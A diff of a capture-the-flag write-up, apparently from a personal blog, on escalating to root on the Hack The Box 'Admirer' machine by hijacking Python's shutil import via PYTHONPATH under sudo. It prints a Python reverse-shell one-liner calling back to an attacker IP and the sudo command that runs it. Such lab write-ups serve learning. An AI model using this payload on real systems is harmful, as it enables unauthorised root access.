SudoKy0t0/SudoKy0t0.github.io/_posts/2026-01-23-htb-admirer-writeup.md

 make_archive(dst, 'gztar', src)
 ```

-Nothing in plaintext, but, we know this script is importing the shutil module.
+Nothing in plaintext, but we know this script is importing the shutil module.
 Following [this post](https://leemendelowitz.github.io/blog/how-does-python-find-packages.html), plus our current configuration when running sudo, we have a clear attack path.

-The post states that when running a python script in linux, it’s modules are being searched by linux with the PYTHONPATH environment variable.
-We can set a new PYTHONPATH environment with a malicious shutil.py, as it will be run as root.
+As explained in the post, when a Python script is executed on Linux, its modules are resolved using the PYTHONPATH environment variable.
+Since we are allowed to set environment variables when running the script with sudo, we can define a custom PYTHONPATH pointing to a directory containing a malicious shutil.py, which will then be imported and executed as root.

-First, we create a shutil.py with a python reverse shell inside of it:
+First, we create a malicious shutil.py with a python reverse shell inside of it:

 ```bash
 waldo@admirer:/var/tmp$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.X",9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")' > shutil.py
 ```

-And now we run as sudo the option on the admin_tasks.sh, setting the PYTHONPATH before:
+And now we run as sudo the option 6 on the admin_tasks.sh, setting the PYTHONPATH before:

 ```bash
 waldo@admirer:/var/tmp$ sudo PYTHONPATH=/var/tmp /opt/scripts/admin_tasks.sh